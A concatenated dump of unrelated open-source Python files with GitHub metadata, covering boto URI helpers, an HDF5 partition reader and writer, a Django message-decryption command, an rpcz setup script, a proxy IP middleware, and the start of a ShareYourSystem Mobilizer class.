version_id = md['version_id']
else:
raise InvalidUriError('Unrecognized scheme "%s"' % scheme)
if len(path_parts) > 1:
object_name = path_parts[1]
return bucket_storage_uri_class(
scheme, bucket_name, object_name, debug,
suppress_consec_slashes=suppress_consec_slashes,
version_id=version_id, generation=generation, is_latest=is_latest)
def storage_uri_for_key(key):
"""Returns a StorageUri for the given key.
:type key: :class:`boto.s3.key.Key` or subclass
:param key: URI naming bucket + optional object.
"""
if not isinstance(key, boto.s3.key.Key):
raise InvalidUriError('Requested key (%s) is not a subclass of '
'boto.s3.key.Key' % str(type(key)))
prov_name = key.bucket.connection.provider.get_provider_name()
uri_str = '%s://%s/%s' % (prov_name, key.bucket.name, key.name)
return storage_uri(uri_str)
boto.plugin.load_plugins(config)
| {
"content_hash": "de6ec8093ae60313bbc470d5db752ee7",
"timestamp": "",
"source": "github",
"line_count": 899,
"max_line_length": 79,
"avg_line_length": 34.550611790878754,
"alnum_prop": 0.6497859051543736,
"repo_name": "dablak/boto",
"id": "0e2752892912912d06786cec2e7e65f464f30106",
"size": "32376",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "boto/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3224"
},
{
"name": "Python",
"bytes": "5296027"
},
{
"name": "Shell",
"bytes": "3071"
}
],
"symlink_target": ""
} |
"""
Writing data to a HDF partition.
"""
from copy import deepcopy
from functools import reduce
import json
import logging
import math
import time
import os
import re
from tables import open_file, StringCol, Int64Col, Float64Col, BoolCol, Int32Col
from tables.exceptions import NoSuchNodeError
import numpy as np
import six
from six import string_types, iteritems, text_type, binary_type
from ambry_sources.sources import RowProxy
from ambry_sources.stats import Stats
from ambry_sources.mpf import MPRowsFile
logger = logging.getLogger(__name__)
# pytables can't store None for ints, so use minimal int value to store None.
MIN_INT32 = np.iinfo(np.int32).min
MIN_INT64 = np.iinfo(np.int64).min
class HDFError(Exception):
pass
class HDFPartition(object):
""" Stores partition data in the HDF (*.h5) file. """
EXTENSION = '.h5'
VERSION = 1
def __init__(self, url_or_fs, path=None):
"""
Args:
url_or_fs (str or filesystem):
path (str):
"""
from fs.opener import opener
if path:
self._fs, self._path = url_or_fs, path
else:
self._fs, self._path = opener.parse(url_or_fs)
if not self._fs.hassyspath(''):
# Pytables requirement.
raise HDFError('HDFPartition requires filesystem having sys path.')
self._writer = None
self._reader = None
self._process = None # Process name for report_progress
self._start_time = 0
if not self._path.endswith(self.EXTENSION):
self._path = self._path + self.EXTENSION
@property
def path(self):
return self._path
@property
def syspath(self):
if self.exists:
return self._fs.getsyspath(self.path)
else:
return None
@property
def info(self):
return self._info(self.reader)
@property
def exists(self):
return self._fs.exists(self.path)
def remove(self):
if self.exists:
self._fs.remove(self._path)
@property
def meta(self):
if not self.exists:
return None
with self.reader as r:
return r.meta
@property
def stats(self):
return (self.meta or {}).get('stats')
@property
def n_rows(self):
if not self.exists:
return None
with self.reader as r:
return r.n_rows
@property
def headers(self):
if not self.exists:
return None
with self.reader as r:
return r.headers
def run_stats(self):
"""Run the stats process and store the results back in the metadata"""
try:
self._process = 'run_stats'
self._start_time = time.time()
with self.reader as r:
stats = Stats([(c.name, c.type) for c in r.columns]).run(r, sample_from=r.n_rows)
with self.writer as w:
w.set_stats(stats)
finally:
self._process = 'none'
return stats
def load_rows(self, source, run_stats=True):
""" Loads rows from given source.
Args:
source (SourceFile):
run_stats (boolean, optional): if True then collect stat and save it to meta.
Returns:
HDFPartition:
"""
if self.n_rows:
raise HDFError("Can't load_rows; rows already loaded. n_rows = {}".format(self.n_rows))
# None means to determine True or False from the existence of a row spec
try:
self._process = 'load_rows'
self._start_time = time.time()
with self.writer as w:
w.load_rows(source)
if run_stats:
self.run_stats()
finally:
self._process = None
return self
@property
def reader(self):
if not self._reader:
self._reader = HDFReader(self, self.syspath)
return self._reader
def __iter__(self):
""" Iterate over a reader. """
# There is probably a more efficient way in python 2 to do this than to have another yield loop,
# but just returning the reader iterator doesn't work
with self.reader as r:
for row in r:
yield row
def select(self, predicate=None, headers=None):
"""Iterate the results from the reader's select() method"""
with self.reader as r:
for row in r.select(predicate, headers):
yield row
@property
def writer(self):
if not self._writer:
self._process = 'write'
if not self._fs.exists(os.path.dirname(self.path)):
self._fs.makedir(os.path.dirname(self.path), recursive=True)
# we can't use self.syspath here because it may be empty if file does not existf
self._writer = HDFWriter(self, self._fs.getsyspath(self.path))
return self._writer
def report_progress(self):
"""
This function can be called from a higher level to report progress. It is usually called from an alarm
signal handler which is installed just before starting a load_rows operation:
>>> import signal
>>> f = HDFPartition('tmp://foobar')
>>> def handler(signum, frame):
>>> print "Loading: %s, %s rows" % f.report_progress()
>>> f.load_rows( [i,i,i] for i in range(1000))
:return: Tuple: (process description, #records, #total records, #rate)
"""
rec = total = rate = 0
if self._process in ('load_rows', 'write') and self._writer:
rec = self._writer.n_rows
rate = round(float(rec) / float(time.time() - self._start_time), 2)
elif self._reader:
rec = self._reader.pos
total = self._reader.data_end_row
rate = round(float(rec) / float(time.time() - self._start_time), 2)
return (self._process, rec, total, rate)
@classmethod
def _columns(cls, o, n_cols=0):
""" Wraps columns from meta['schema'] with RowProxy and generates them.
Args:
o (any having .meta dict attr):
Generates:
RowProxy: column wrapped with RowProxy
"""
s = o.meta['schema']
assert len(s) >= 1 # Should always have header row.
assert o.meta['schema'][0] == MPRowsFile.SCHEMA_TEMPLATE, (o.meta['schema'][0], MPRowsFile.SCHEMA_TEMPLATE)
# n_cols here is for columns in the data table, which are rows in the headers table
n_cols = max(n_cols, o.n_cols, len(s) - 1)
for i in range(1, n_cols + 1):
# Normally, we'd only create one of these, and set the row on the singleton for
# each row. But in this case, the caller may turn the output of the method into a list,
# in which case all of the rows would have the values of the last one.
rp = RowProxy(s[0])
try:
row = s[i]
except IndexError:
# Extend the row, but make sure the pos value is set property.
ext_row = [i, 'col{}'.format(i)] + [None] * (len(s[0]) - 2)
s.append(ext_row)
row = s[i]
yield rp.set_row(row)
assert o.meta['schema'][0] == MPRowsFile.SCHEMA_TEMPLATE
@classmethod
def _info(cls, o):
return dict(
version=o.version,
data_start_pos=0,
meta_start_pos=0,
rows=o.n_rows,
cols=o.n_cols,
header_rows=o.meta['row_spec']['header_rows'],
data_start_row=0,
data_end_row=None,
comment_rows=o.meta['row_spec']['comment_rows'],
headers=o.headers
)
class HDFWriter(object):
def __init__(self, parent, filename):
if not isinstance(filename, string_types):
raise ValueError(
'Pytables requires filename parameter as string. Got {} instead.'
.format(filename.__class__))
self.parent = parent
self.version = HDFPartition.VERSION
self.n_rows = 0
self.n_cols = 0
self.cache = []
if os.path.exists(filename):
self._h5_file = open_file(filename, mode='a')
self.meta = HDFReader._read_meta(self._h5_file)
self.version, self.n_rows, self.n_cols = _get_file_header(
self._h5_file.root.partition.file_header)
else:
# No, doesn't exist
self._h5_file = open_file(filename, mode='w')
self.meta = deepcopy(MPRowsFile.META_TEMPLATE)
self.header_mangler = lambda name: re.sub('_+', '_', re.sub('[^\w_]', '_', name).lower()).rstrip('_')
if self.n_rows == 0:
self.meta['about']['create_time'] = time.time()
@property
def info(self):
return HDFPartition._info(self)
def set_col_val(name_or_pos, **kwargs):
pass
@property
def headers(self):
""" Return the headers rows. """
return [e.name for e in HDFPartition._columns(self)]
@headers.setter
def headers(self, headers):
""" Set column names. """
if not headers:
return
assert isinstance(headers, (tuple, list)), headers
for i, row in enumerate(HDFPartition._columns(self, len(headers))):
assert isinstance(headers[i], string_types)
row.name = headers[i]
assert self.meta['schema'][0] == MPRowsFile.SCHEMA_TEMPLATE
@property
def columns(self):
""" Returns the columns specifications. """
return HDFPartition._columns(self)
@columns.setter
def columns(self, headers):
for i, row in enumerate(HDFPartition._columns(self, len(headers))):
h = headers[i]
if isinstance(h, dict):
raise NotImplementedError()
else:
row.name = h
def column(self, name_or_pos):
for h in self.columns:
if name_or_pos == h.pos or name_or_pos == h.name:
return h
raise KeyError("Didn't find '{}' as either a name nor a position ".format(name_or_pos))
def insert_row(self, row):
self.n_rows += 1
self.cache.append(row)
if len(self.cache) >= 10000:
self._write_rows()
def insert_rows(self, rows):
""" Inserts a list of rows. Does not insert iterators.
Args:
rows (list of list):
"""
self.n_rows += len(rows)
self._write_rows(rows)
def load_rows(self, source):
""" Loads rows from an iterator.
Args:
source (iterator):
columns (list of intuit.Column): schema (columns description) of the source.
"""
spec = getattr(source, 'spec', None)
for i, row in enumerate(iter(source)):
if spec and i < (spec.start_line or 1):
# skip comments and headers. If start line is empty, assuming first row is header.
continue
if spec and spec.end_line and i > spec.end_line:
# skip footer
break
self.insert_row(row)
# If the source has a headers property, and it's defined, then
# use it for the headers. This often has to be called after iteration, because
# the source may have the header as the first row
try:
if source.headers:
self.headers = source.headers
except AttributeError:
pass
self._write_rows()
def close(self):
if self._h5_file:
self._write_rows()
self._h5_file.close()
self._h5_file = None
if self.parent:
self.parent._writer = None
def write_file_header(self):
""" Write the version, number of rows and number of cols to the h5 file. """
if 'file_header' in self._h5_file.root.partition:
self._h5_file.remove_node('/partition', 'file_header')
descriptor = {
'version': Int32Col(),
'n_rows': Int32Col(),
'n_cols': Int32Col()
}
table = self._h5_file.create_table(
'/partition', 'file_header',
descriptor, 'Header of the file.')
table.row['version'] = HDFPartition.VERSION
table.row['n_rows'] = self.n_rows
table.row['n_cols'] = self.n_cols
table.row.append()
table.flush()
def set_types(self, ti):
""" Set Types from a type intuiter object. """
results = {int(r['position']): r for r in ti._dump()}
for i in range(len(results)):
for k, v in iteritems(results[i]):
k = {'count': 'type_count'}.get(k, k)
self.column(i + 1)[k] = v
if not self.column(i + 1).type:
self.column(i + 1).type = results[i]['resolved_type']
def set_stats(self, stats):
""" Copy stats into the schema.
Args:
stats (Stats):
"""
for name, stat_set in iteritems(stats.dict):
row = self.column(name)
for k, v in iteritems(stat_set.dict):
k = {'count': 'stat_count'}.get(k, k)
row[k] = v
def set_source_spec(self, spec):
"""Set the metadata coresponding to the SourceSpec, excluding the row spec parts. """
ms = self.meta['source']
ms['url'] = spec.url
ms['fetch_time'] = spec.download_time
ms['file_type'] = spec.filetype
ms['url_type'] = spec.urltype
ms['encoding'] = spec.encoding
me = self.meta['excel']
me['worksheet'] = spec.segment
if spec.columns:
for i, sc in enumerate(spec.columns, 1):
c = self.column(i)
if c.name:
assert sc.name == c.name
c.start = sc.start
c.width = sc.width
def set_row_spec(self, row_spec, headers):
""" Saves row_spec to meta and populates headers.
Args:
row_spec (dict): dict with rows specifications
Example: {
'header_rows': [1,2],
'comment_rows': [0],
'start_row': 3,
'end_row': None,
'data_pattern': ''
}
"""
self.data_start_row = row_spec['start_row']
self.data_end_row = row_spec['end_row']
self.meta['row_spec'] = row_spec
self.headers = [self.header_mangler(h) for h in headers]
self._write_meta()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
if exc_val:
return False
def _validate_groups(self):
""" Checks and creates needded groups in the h5 file. """
if 'partition' not in self._h5_file.root:
self._h5_file.create_group('/', 'partition', 'Partition.')
if 'meta' not in self._h5_file.root.partition:
self._h5_file.create_group('/partition', 'meta', 'Meta information of the partition.')
def _write_rows(self, rows=None):
self._write_meta()
self.write_file_header()
rows, clear_cache = (self.cache, True) if not rows else (rows, False)
if not rows:
return
# convert columns to descriptor
rows_descriptor = _get_rows_descriptor(self.columns)
if 'rows' not in self._h5_file.root.partition:
self._h5_file.create_table(
'/partition', 'rows', rows_descriptor, 'Rows (data) of the partition.')
rows_table = self._h5_file.root.partition.rows
partition_row = rows_table.row
# h5 colnames order has to match to columns order to provide proper iteration over rows.
assert self.headers == rows_table.colnames
description = [
(col_name, getattr(rows_table.description, col_name)) for col_name in rows_table.colnames]
for row in rows:
for col_name, col_desc in description:
value = _serialize(col_desc.__class__, row[col_desc._v_pos])
if isinstance(value, text_type):
value = value.encode('utf-8')
partition_row[col_name] = value
partition_row.append()
rows_table.flush()
# Hope that the max # of cols is found in the first 100 rows
# FIXME! This won't work if rows is an interator.
self.n_cols = reduce(max, (len(e) for e in rows[:100]), self.n_cols)
if clear_cache:
self.cache = []
def _write_meta(self):
""" Writes meta to the h5 file. """
assert self.meta['schema'][0] == MPRowsFile.SCHEMA_TEMPLATE
self._validate_groups()
self._save_about()
self._save_comments()
self._save_excel()
self._save_geo()
self._save_row_spec()
self._save_schema()
self._save_source()
def _save_meta_child(self, child, descriptor):
""" Saves given child of the meta to the table with same name to the h5 file.
Args:
child (str): name of the child.
descriptor (dict): descriptor of the table.
"""
# always re-create table on save. It works better than rows removing.
if child in self._h5_file.root.partition.meta:
self._h5_file.remove_node('/partition/meta', child)
table = self._h5_file.create_table(
'/partition/meta', child,
descriptor, 'meta.{}'.format(child))
row = table.row
for k, v in self.meta[child].items():
if k in ('header_rows', 'comment_rows'):
v = json.dumps(v or '')
row[k] = _serialize(descriptor[k].__class__, v)
row.append()
table.flush()
def _save_about(self):
descriptor = {
'load_time': Float64Col(),
'create_time': Float64Col()
}
self._save_meta_child('about', descriptor)
def _save_schema(self):
""" Saves meta.schema table of the h5 file.
"""
descriptor = {
'pos': Int32Col(),
'name': StringCol(itemsize=255),
'type': StringCol(itemsize=255),
'description': StringCol(itemsize=1024),
'start': Int32Col(),
'width': Int32Col(),
'position': Int32Col(),
'header': StringCol(itemsize=255),
'length': Int32Col(),
'has_codes': BoolCol(),
'type_count': Int32Col(),
'ints': Int32Col(),
'floats': Int32Col(),
'strs': Int32Col(),
'unicode': Int32Col(),
'nones': Int32Col(),
'datetimes': Int32Col(),
'dates': Int32Col(),
'times': Int32Col(),
'strvals': StringCol(itemsize=255),
'flags': StringCol(itemsize=255),
'lom': StringCol(itemsize=1),
'resolved_type': StringCol(itemsize=40),
'stat_count': Int32Col(),
'nuniques': Int32Col(),
'mean': Float64Col(),
'std': Float64Col(),
'min': Float64Col(),
'p25': Float64Col(),
'p50': Float64Col(),
'p75': Float64Col(),
'max': Float64Col(),
'skewness': Float64Col(),
'kurtosis': Float64Col(),
'hist': StringCol(itemsize=255),
'text_hist': StringCol(itemsize=255),
'uvalues': StringCol(itemsize=5000)
}
# always re-create table on save. It works better than rows removing.
if 'schema' in self._h5_file.root.partition.meta:
self._h5_file.remove_node('/partition/meta', 'schema')
self._h5_file.create_table(
'/partition/meta', 'schema',
descriptor, 'meta.schema',
createparents=True)
schema = self.meta['schema'][0]
table = self._h5_file.root.partition.meta.schema
row = table.row
for col_descr in self.meta['schema'][1:]:
for i, col_name in enumerate(schema):
if col_name in ('hist', 'uvalues'):
value = json.dumps(col_descr[i] or '')
else:
value = _serialize(descriptor[col_name].__class__, col_descr[i])
if isinstance(value, text_type):
value = value.encode('utf-8')
row[col_name] = value
row.append()
table.flush()
def _save_excel(self):
descriptor = {
'worksheet': StringCol(itemsize=255),
'datemode': Int32Col()
}
self._save_meta_child('excel', descriptor)
def _save_comments(self):
descriptor = {
'header': StringCol(itemsize=255),
'footer': StringCol(itemsize=255)
}
self._save_meta_child('comments', descriptor)
def _save_source(self):
descriptor = {
'fetch_time': Float64Col(),
'encoding': StringCol(itemsize=255),
'url': StringCol(itemsize=1024),
'file_type': StringCol(itemsize=50),
'inner_file': StringCol(itemsize=255),
'url_type': StringCol(itemsize=255),
}
self._save_meta_child('source', descriptor)
def _save_row_spec(self):
descriptor = {
'end_row': Int32Col(),
'header_rows': StringCol(itemsize=255), # comma separated ints or empty string.
'start_row': Int32Col(),
'comment_rows': StringCol(itemsize=255), # comma separated ints or empty string.
'data_pattern': StringCol(itemsize=255)
}
self._save_meta_child('row_spec', descriptor)
def _save_geo(self):
descriptor = {
'srs': Int32Col(),
'bb': Int32Col(),
}
self._save_meta_child('geo', descriptor)
class HDFReader(object):
""" Read an h5 file. """
def __init__(self, parent, filename):
""" Reads the filename and prepares for iterating over rows.
Args:
parent (HDFPartition):
filename (str):
"""
if not isinstance(filename, string_types):
# This is the pytables constraint.
raise ValueError(
'HDFReader requires string with filename. Got {} instead.'
.format(filename.__class__))
self.parent = parent
self._h5_file = open_file(filename, mode='r')
self._headers = None
self.pos = 0 # Row position for next read.
self.n_rows = 0
self.n_cols = 0
self.version, self.n_rows, self.n_cols = _get_file_header(self._h5_file.root.partition.file_header)
self._in_iteration = False
self._meta = None
@property
def info(self):
return HDFPartition._info(self)
@property
def meta(self):
if self._meta is None:
self._meta = self._read_meta(self._h5_file)
return self._meta
@property
def columns(self):
""" Returns columns specifications in the ambry_source format. """
return HDFPartition._columns(self)
@property
def headers(self):
""" Returns header (column names).
Returns:
list of str:
"""
return [e.name for e in HDFPartition._columns(self)]
@property
def raw(self):
""" A raw iterator, which ignores the data start and stop rows and returns all rows, as rows. """
try:
if 'rows' not in self._h5_file.root.partition:
# table with rows was not created.
raise StopIteration
self._in_iteration = True
table = self._h5_file.root.partition.rows
for row in table.iterrows():
yield [row[c] for c in table.colnames]
self.pos += 1
finally:
self._in_iteration = False
self.close()
@property
def rows(self):
""" Iterator for reading rows. """
# For HDF it's exactly the same as raw iterator.
return self.raw
def __iter__(self):
""" Iterator for reading rows as RowProxy objects
WARNING: This routine generates RowProxy objects. RowProxy objects
are reused, so if you construct a list directly from the output from this method,
the list will have multiple copies of a single RowProxy, which will
have as an inner row the last result row. If you will be directly constructing
a list, use a getter that extracts the inner row, or which converted the RowProxy
to a dict.
"""
rp = RowProxy(self.headers)
try:
if 'rows' not in self._h5_file.root.partition:
# rows table was not created.
raise StopIteration
self._in_iteration = True
table = self._h5_file.root.partition.rows
for row in table.iterrows():
r = [_deserialize(row[c]) for c in table.colnames]
yield rp.set_row(r)
self.pos += 1
finally:
self._in_iteration = False
def select(self, predicate=None, headers=None):
""" Select rows from the reader using a predicate and itemgetter to return a subset of elements.
Args:
predicate (callable, optional): if defined, a callable that is called for each rowm and
if it returns true, the row is included in the output.
headers (list, optional): if defined, a list or tuple of header names to return from each row
Returns:
iterable: iterable of results
WARNING: This routine works from the reader iterator, which returns RowProxy objects. RowProxy
objects are reused, so if you construct a list directly from the output from
this method, the list will have multiple copies of a single RowProxy,
which will have as an inner row the last result row. If you will
be directly constructing a list, use a getter that extracts the inner row, or which
converted the RowProxy to a dict:
list(s.datafile.select(lambda r: r.stusab == 'CA', lambda r: r.dict))
"""
if headers:
from operator import itemgetter
ig = itemgetter(*headers)
rp = RowProxy(headers)
getter = lambda r: rp.set_row(ig(r.dict))
else:
getter = None
if getter is not None and predicate is not None:
return six.moves.map(getter, filter(predicate, iter(self)))
elif getter is not None and predicate is None:
return six.moves.map(getter, iter(self))
elif getter is None and predicate is not None:
return six.moves.filter(predicate, self)
else:
return iter(self)
def close(self):
if self._h5_file:
self.meta # In case caller wants to read meta after close.
self._h5_file.close()
self._h5_file = None
if self.parent:
self.parent._reader = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
if exc_val:
return False
@classmethod
def _read_meta(self, h5_file):
meta = deepcopy(MPRowsFile.META_TEMPLATE)
for child, group in meta.items():
if child == 'schema':
# This is the special case because meta.schema construct from many rows.
new_schema = [MPRowsFile.SCHEMA_TEMPLATE]
for col_descr in self._read_meta_child(h5_file, 'schema'):
col = []
for e in MPRowsFile.SCHEMA_TEMPLATE:
col.append(_deserialize(col_descr.get(e)))
new_schema.append(col)
meta['schema'] = new_schema
else:
# This is the common case when child of the meta constructs from exactly one row.
try:
saved_data = self._read_meta_child(h5_file, child)
if saved_data:
saved_data = saved_data[0]
else:
saved_data = {}
except NoSuchNodeError:
logger.warning('meta.{} table does not exist. Using default values.'.format(child))
saved_data = {}
for k, default_value in group.items():
meta[child][k] = saved_data.get(k, default_value)
return meta
@classmethod
def _read_meta_child(self, h5_file, child):
""" Reads all rows from `child` table of h5 file and returns it.
Args:
child (str): name of the table from h5 file.
Returns:
dict:
"""
table = getattr(h5_file.root.partition.meta, child)
ret = []
for row in table.iterrows():
elem = {}
for c in table.colnames:
v = _deserialize(row[c])
if c in ('header_rows', 'comment_rows', 'hist', 'uvalues'):
v = json.loads(v)
elem[c] = v
ret.append(elem)
return ret
def _get_rows_descriptor(columns):
""" Converts columns specifications from ambry_sources format to pytables descriptor.
Args:
columns (list of dict)
Returns:
dict: valid pytables descriptor.
"""
TYPE_MAP = {
'int': lambda pos: Int32Col(pos=pos),
'long': lambda pos: Int64Col(pos=pos),
'str': lambda pos: StringCol(itemsize=255, pos=pos),
'bytes': lambda pos: StringCol(itemsize=255, pos=pos),
'float': lambda pos: Float64Col(pos=pos),
'unknown': lambda pos: StringCol(itemsize=255, pos=pos),
}
descriptor = {}
for column in columns:
pytables_type = TYPE_MAP.get(column['type'])
if not pytables_type:
raise Exception(
'Failed to convert `{}` ambry_sources type to pytables type.'.format(column['type']))
descriptor[column['name']] = pytables_type(column['pos'])
return descriptor
def _serialize(col_type, value):
""" Converts value to format ready to save to h5 file. """
if col_type == Float64Col:
try:
float(value)
except (TypeError, ValueError):
# it is not a valid float.
value = None
if col_type in (Int32Col, Int64Col):
try:
int(value)
except (TypeError, ValueError):
# it is not a valid int.
value = None
TYPE_MAP = {
Int64Col: MIN_INT64,
Int32Col: MIN_INT32,
Float64Col: float('nan'),
StringCol: '',
}
force = False
if value is None:
force = True
elif isinstance(value, string_types) and value == 'NA':
force = True
if force and col_type in TYPE_MAP:
return TYPE_MAP[col_type]
return value
def _deserialize(value):
""" Converts None replacements stored in the pytables to None. """
if isinstance(value, six.integer_types) and value in (MIN_INT32, MIN_INT64):
return None
elif isinstance(value, float) and math.isnan(value):
return None
elif isinstance(value, binary_type):
return value.decode('utf-8')
return value
def _get_file_header(table):
""" Returns tuple with file headers - (version, rows_number, cols_number). """
for row in table.iterrows():
return row['version'], row['n_rows'], row['n_cols']
return (None, 0, 0)
| {
"content_hash": "0886b6ae40e82a4d9fd21d72859cc81e",
"timestamp": "",
"source": "github",
"line_count": 1022,
"max_line_length": 115,
"avg_line_length": 31.23972602739726,
"alnum_prop": 0.5464027312306199,
"repo_name": "CivicKnowledge/ambry_sources",
"id": "063eb62e91c84a0e469e6938defe368616de0129",
"size": "31951",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ambry_sources/hdf_partitions/core.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Makefile",
"bytes": "83"
},
{
"name": "Python",
"bytes": "301084"
},
{
"name": "Shell",
"bytes": "263"
}
],
"symlink_target": ""
} |
import subprocess
from django.core.management.base import BaseCommand
from django.utils.encoding import force_str
from ngw.core.models import ContactMsg
class Command(BaseCommand):
help = 'Try to decrypt a message with an AES passphrase'
def add_arguments(self, parser):
parser.add_argument('msgid', type=int)
parser.add_argument('aeskey')
def handle(self, *args, **options):
msgid = int(options['msgid'])
passphrase = options['aeskey']
msg = ContactMsg.objects.get(pk=msgid)
msgtext = msg.text.encode('utf-8')
print(msg.text)
cleartext = subprocess.check_output(
['openssl', 'enc', '-aes-256-cbc',
'-pass', 'pass:%s' % passphrase,
'-d', '-base64', '-A'],
input=msgtext)
cleartext = force_str(cleartext)
print(cleartext)
msg.text = cleartext
msg.read_date = None
msg.read_by = None
msg.save()
| {
"content_hash": "b11fe3e5731b2fcfef351c9a382398e9",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 60,
"avg_line_length": 27.885714285714286,
"alnum_prop": 0.6004098360655737,
"repo_name": "nirgal/ngw",
"id": "c7516dfe06395d7755e0c1de4459b04ca1fe8985",
"size": "976",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "core/management/commands/recover_message.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "19642"
},
{
"name": "HTML",
"bytes": "681"
},
{
"name": "JavaScript",
"bytes": "56384"
},
{
"name": "Jinja",
"bytes": "85680"
},
{
"name": "Makefile",
"bytes": "958"
},
{
"name": "Python",
"bytes": "577540"
}
],
"symlink_target": ""
} |
import os
import shutil
from distutils.command import build as build_module
from setuptools import setup, Command, Extension
import compiler
def _build_rpcz_proto():
compiler.generate_proto('../src/rpcz/proto/rpcz.proto', 'rpcz')
def _build_test_protos():
compiler.generate_proto('../test/proto/search.proto', 'tests')
compiler.generate_proto(
'../test/proto/search.proto', 'tests',
with_plugin='python_rpcz', suffix='_rpcz.py',
plugin_binary=
'../build/src/rpcz/plugin/python/protoc-gen-python_rpcz')
class build(build_module.build):
def run(self):
_build_rpcz_proto()
_build_test_protos()
shutil.copy('compiler.py', 'rpcz')
build_module.build.run(self)
class gen_pyext(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
if os.system('cython --cplus cython/pywraprpcz.pyx') != 0:
raise IOError("Running cython failed.")
setup(
name = "rpcz",
version = "0.9",
author = "Nadav Samet",
author_email = "[email protected]",
description = "An RPC implementation for Protocol Buffer based on ZeroMQ",
license = "Apache 2.0",
keywords = "protocol-buffers rpc zeromq 0mq",
packages=['rpcz', 'tests'],
url='http://code.google.com/p/rpcz/',
long_description='',
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Software Development :: Libraries :: Python Modules",
"License :: OSI Approved :: Apache Software License",
],
cmdclass = {
'build': build,
'gen_pyext': gen_pyext,
},
install_requires=[
'protobuf>=2.5.0',
'pyzmq>=14.3.1'
],
ext_modules=[
Extension("rpcz.pywraprpcz", ["cython/pywraprpcz.cpp"],
extra_compile_args=['-std=c++11'],
libraries=["rpcz"],
include_dirs=['../include', '../build/src'],
library_dirs=['../build/deps/lib', '../build/src/rpcz'],
language='c++')
],
)
| {
"content_hash": "e339da56a33c12b51193cdef953bc283",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 78,
"avg_line_length": 28.824324324324323,
"alnum_prop": 0.5785278949835911,
"repo_name": "reinfer/rpcz",
"id": "ab3d4a566de15583b443d826bf5f89d0829ac249",
"size": "2179",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "python/setup.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "19837"
},
{
"name": "C++",
"bytes": "564454"
},
{
"name": "Python",
"bytes": "41694"
}
],
"symlink_target": ""
} |
'''
Created on Dec 20, 2012
@author: rtermondt
'''
class WebFactionFixes(object):
"""Sets 'REMOTE_ADDR' based on 'HTTP_X_FORWARDED_FOR', if the latter is
set.
Based on http://djangosnippets.org/snippets/1706/
"""
def process_request(self, request):
if 'HTTP_X_FORWARDED_FOR' in request.META:
ip = request.META['HTTP_X_FORWARDED_FOR'].split(",")[0].strip()
request.META['REMOTE_ADDR'] = ip
| {
"content_hash": "d1060079944686e12cd347bec5fbf5ae",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 75,
"avg_line_length": 23.526315789473685,
"alnum_prop": 0.6196868008948546,
"repo_name": "richtermondt/inithub-web",
"id": "642d8c8ac1b67e01c8ee0fa302fc4fa6a14c1455",
"size": "447",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "inithub/inithub/middleware.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "59841"
},
{
"name": "HTML",
"bytes": "117410"
},
{
"name": "JavaScript",
"bytes": "82685"
},
{
"name": "Python",
"bytes": "128575"
}
],
"symlink_target": ""
} |
"""
<DefineSource>
@Date : Fri Nov 14 13:20:38 2014 \n
@Author : Erwan Ledoux \n\n
</DefineSource>
A Mobilizer
"""
#<DefineAugmentation>
import ShareYourSystem as SYS
BaseModuleStr="ShareYourSystem.Standards.Walkers.Recruiter"
DecorationModuleStr="ShareYourSystem.Standards.Classors.Classer"
SYS.setSubModule(globals())
#</DefineAugmentation>
#<ImportSpecificModules>
from ShareYourSystem.Standards.Classors import Deriver
from ShareYourSystem.Standards.Noders import Noder
#</ImportSpecificModules>
#<DefineFunctions>
def getMobilizedIsBoolWithParentClassAndDeriveClassesList(
_ParentClass,_DeriveClassesList):
#Debug
print('Mobilizer l.37')
print('_ParentClass is ',_ParentClass)
print('_DeriveClassesList is ',_DeriveClassesList)
print('')
#Return
return any(
map(
lambda __DeriveClass:
Deriver.getIsDerivedBoolWithParentClassAndDeriveClass(
_ParentClass,
__DeriveClass
),
_DeriveClassesList
)
)
#<DefineFunctions>
#<DefineClass>
@DecorationClass()
class MobilizerClass(BaseClass):
#Definition
RepresentingKeyStrsList=[
'MobilizingNameStrsList'
]
def default_init(self,
_MobilizingNameStrsList=None,
_MobilizingCollectionSuffixStr="",
_MobilizedAttestClassesList=None,
**_KwargVariablesDict
):
#Call the parent __init__ method
BaseClass.__init__(self,**_KwargVariablesDict)
def do_mobilize(self):
#Check
if self.VisitingCollectionStrsList==None:
self.VisitingCollectionStrsList=[
self.CollectingCollectionStr
]
#map
self.MobilizedAttestClassesList=map(
SYS.getClassWithNameStr,
self.MobilizingNameStrsList
)
#debug
'''
self.debug(('self.',self,['MobilizedAttestClassesList']))
'''
#append
self.RecruitingConcludeConditionVariable.append(
(
'SelfClass',
getMobilizedIsBoolWithParentClassAndDeriveClassesList,
self.MobilizedAttestClassesList
)
)
#debug
'''
self.debug(('self.',self,['RecruitingConcludeConditionVariable']))
'''
#recruit
self.recruit()
#debug
'''
self.debug(('self.',self,['RecruitedFlatCumulateVariablesList']))
'''
#Split the different names into different collections
map(
lambda __RecruitedFlatCollectVariable:
self.grasp(
__RecruitedFlatCollectVariable
).catch(
__RecruitedFlatCollectVariable.__class__.NameStr+self.MobilizingCollectionSuffixStr,
),
self.RecruitedFlatCumulateVariablesList
)
#</DefineClass>
| {
"content_hash": "956580c0598673c8177e8ffdc325cfc0",
"timestamp": "",
"source": "github",
"line_count": 121,
"max_line_length": 90,
"avg_line_length": 20.520661157024794,
"alnum_prop": 0.7249295207410391,
"repo_name": "Ledoux/ShareYourSystem",
"id": "d976ecb3602a083f624ee380b1080ffd975ea886",
